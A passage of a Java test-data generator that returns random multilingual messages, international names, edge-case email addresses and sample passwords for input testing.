				"Ця пропозиція не є прийнятним. Я хотів би попросити вас, щоб підняти суму мінімум 500 €. На поромі коштуватиме мені принаймні половину запропонованого швидкість (оплачується заздалегідь). Водій має GPS стеження, реєстраційний номер DW29911. Ласка, зворотній зв'язок mojemail@emailowo.com~~HEAD=dobj або Звертатися за http://randomwebsite.com/cgi-bin/random.pl~~pobj. Телефон +48 (71) 722 11 10. Компанія Транспорт & Transportowo зр. зр. к.",
				"یہ پیشکش قابل قبول نہیں ہے. میں 500 € کی ایک کم از کم کرنے کے لئے رقم میں اضافہ کرنے کے لئے آپ سے پوچھیں گے. فیری سواری مجھے (پیشگی ادائیگی) میں کم از کم نصف مجوزہ شرح کی لاگت آئے گی. ڈرائیور GPS سے باخبر رہنے، رجسٹریشن نمبر DW29911 ہے. http://randomwebsite.com/cgi-bin/random.pl طرف آراء mojemail@emailowo.com یا سے رابطہ کریں. فون نمبر +48 (71) 722 11 10. کمپنی ٹرانسپورٹ اینڈ Transportowo SP. SP. K.",
				"Bu taklif qabul qilinishi mumkin emas. Men 500 € minimal miqdori oshirish so'raymiz edi. Ferry surtish menga (oldindan to'langan) kamida yarim taklif etilayotgan darajasi mol bo'ladi. haydovchi GPS tomosha, ro'yxatga olish raqami DW29911 bor. Http://randomwebsite.com/cgi-bin/random.pl tomonidan hisobot mojemail@emailowo.com yoki murojaat qiling. Telefon raqami +48 (71) 722 11 10. Kompaniyaning Transport & Transportowo sp. sp. k.",
				"Đề nghị này không được chấp nhận. Tôi sẽ hỏi bạn tăng số tiền tối thiểu là 500 €. Cưỡi phà sẽ chi phí cho tôi ít nhất là một nửa tỷ lệ đề xuất (trả trước). Người lái xe có GPS theo dõi, số đăng ký DW29911. Xin vui lòng phản hồi mojemail@emailowo.com hoặc liên lạc bằng các http://randomwebsite.com/cgi-bin/random.pl. Số điện thoại +48 (71) 722 11 10 Công ty Vận tải & Transportowo sp. sp. k.",
				"Nid yw'r cynnig yn dderbyniol. Byddwn yn gofyn i chi godi y swm i isafswm o 500 €. Bydd reidiau fferi yn costio o leiaf hanner y gyfradd arfaethedig (a delir o flaen llaw) mi. Mae gan y gyrrwr tracio GPS, rhif cofrestru DW29911. Os gwelwch yn dda adborth mojemail@emailowo.com neu cysylltwch gan y http://randomwebsite.com/cgi-bin/random.pl. Rhif Ffôn 48 ​​(71) 722 11 10. Cwmni Trafnidiaeth a Transportowo sp. sp. k.",
				"דאס פאָרשלאָגן איז ניט פּאַסיק. איך וואָלט פרעגן איר צו כאַפּן די סומע צו אַ מינימום פון 500 €. פּראָם רידעס וועט קאָסטן מיר לפּחות האַלב די פּראָפּאָסעד קורס (באַצאָלט אין שטייַגן). די שאָפער האט גפּס טראַקינג, רעגיסטראַציע נומער דוו29911. ביטע באַמערקונגען mojemail@emailowo.com אָדער קאָנטאַקט דורך די http://randomwebsite.com/cgi-bin/random.pl. טעלעפאָנירן נומער +48 (71) 722 11 10. פֿירמע טראַנספּאָרט & טראַנספּאָרטאָוואָ ספּ. Sp. ק.",
				"Eleyi jẹ ìfilọ ko se itewogba. Emi yoo beere ti o ba si gbé awọn iye lati kan kere ti 500 €. Ferry keke gigun yoo na mi ni o kere idaji awọn dabaa oṣuwọn (san ni advance). The iwakọ ni o ni GPS titele, ìforúkọsílẹ nọmba DW29911. Wu esi mojemail@emailowo.com tabi nipasẹ awọn olubasọrọ http://randomwebsite.com/cgi-bin/random.pl. Nọmba foonu +48 (71) 722 11 10. Company Transport & Transportowo sp. sp. k.",
				"Lesi simemo ngeke kwamukeleke. Ngingathanda ukucela kuwe ukuba ukukhulisa inani lemali okungenani 500 €. Ferry ugibele izobiza kimi okungenani ingxenye rate ehlongozwayo (bazikhokhela kusengaphambili). Umshayeli ine GPS kokulandela, inombolo yokubhaliswa DW29911. Ukujabulisa impendulo mojemail@emailowo.com noma contact by the http://randomwebsite.com/cgi-bin/random.pl. Hambayo Inombolo +48 (71) 722 11 10. Inkampani Transport & Transportowo sp. sp. k." };
		String result = possible[(int) (randInt(0, possible.length - 1))];
		return result;
	}

	public static String getRandomName() {
		String possible[] = { "Abdallah", "Peter", "María", "Agustín",
				"Sebastián", "Léa", "Sofía", "محمد", "文 Wen", "Ерacыл", "민준",
				"مريم", "Айзeрe", "서연", "Shu-fen", "Դավիթ", "Максим", "გიორგი",
				"Γεώργιος", "Mathéo", "Артём", "Yusuf", "Նարե", "Виктория",
				"Louise", "Μαρία", "Софья", "Ганна", "Oliver", "Tiare",
				"Hinano", "Дар‘я", "Michał" };
		String result = possible[(int) (randInt(0, possible.length - 1))];
		return result;
	}

	public static String getRandomFamilyName() {
		String possible[] = { "Fernández", "Rodríguez", "González", "Muñoz",
				"Alvaréz", "Huamán", "Smith", "Jones-Williams", "Li",
				"Tremblay", "Côté", "St-Pierre", "Kelmendi", "Հովհաննիսյան",
				"Գրիգորյան", "Gruber", "Məmmədov", "Əliyev", "Ivanoŭ",
				"Kazloŭ", "Goossens", "Hodžić", "Čengić", "Đurić", "Kovačević",
				"Nováková", "Jensen", "Hämäläinen", "ბერიძე", "Müller",
				"Παπαδόπουλος", "Αθανασιάδης", "Horváth", "O'Connor",
				"Bērziņš", "Žukauskas", "Schmit", "Van den Berg",
				"Van der Meer", "Nowak", "Gonçalves", "Смирно́в", "Milošević",
				"Tóth", "Kovačič", "Müller", "Yılmaz", "Yıldız", "Shevchenko",
				"Hernández", "Peña", "Rəsulov", "বন্দ্যোপাধ্যায়", "হোসেন",
				"何", "მამედოვი", "מזרחי", "佐藤" };
		String result = possible[(int) (randInt(0, possible.length - 1))];
		return result;
	}

	public static String getRandomEmail() {
		String possible[] = {
				"email@example.com",
				"firstname.lastname@example.com",
				"email@subdomain.example.com",
				"firstname+lastname@example.com",
				"email@123.123.123.123",
				"email@[123.123.123.123]",
				"“email”@example.com",
				"1234567890@example.com",
				"email@example-one.com",
				"_______@example.com",
				"email@example.name",
				"email@example.museum",
				"email@example.co.jp",
				"firstname-lastname@example.com",
				"much.“more\\ unusual”@example.com",
				"very.unusual.“@”.unusual.com@example.com",
				"very.“(),:;<>[]”.VERY.“very@\\ \"very”.unusual@strange.example.com",
				"prettyandsimple@example.com",
				"very.common@example.com",
				"disposable.style.email.with+symbol@example.com",
				"other.email-with-dash@example.com",
				"\"much.more unusual\"@example.com",
				"\"very.unusual.@.unusual.com\"@example.com",
				"\"very.(),:;<>[]\\\".VERY.\\\"very@\\\\ \\\"very\\\".unusual\"@strange.example.com",
				"admin@mailserver1", "#!$%&'*+-/=?^_`{}|~@example.org",
				"\"()<>[]:,;@\\\"!#$%&'*+-/=?^_`{}| ~.a\"@example.org",
				"\" \"@example.org", "üñîçøðé@example.com",
				"üñîçøðé@üñîçøðé.com", "Pelé@example.com",
				"δοκιμή@παράδειγμα.δοκιμή", "我買@屋企.香港", "甲斐@黒川.日本",
				"чебурашка@ящик-с-апельсинами.рф" };
		String result = possible[(int) (randInt(0, possible.length - 1))];
		return result;
	}

	public static String getRandomPassword() {
		String possible[] = { "12345678", "password", "qwerty", "!@#$%^&*()_+", "<ÓOzÄ¶ZLIi2P»,¨oHÚn1kIOOAßo÷úA", "IazucPsY+?a&Á§ó(ó|N×)(8AüÔK3LZ" };
		String result = possible[(int) (randInt(0, possible.length - 1))];
		return result;
	}
}
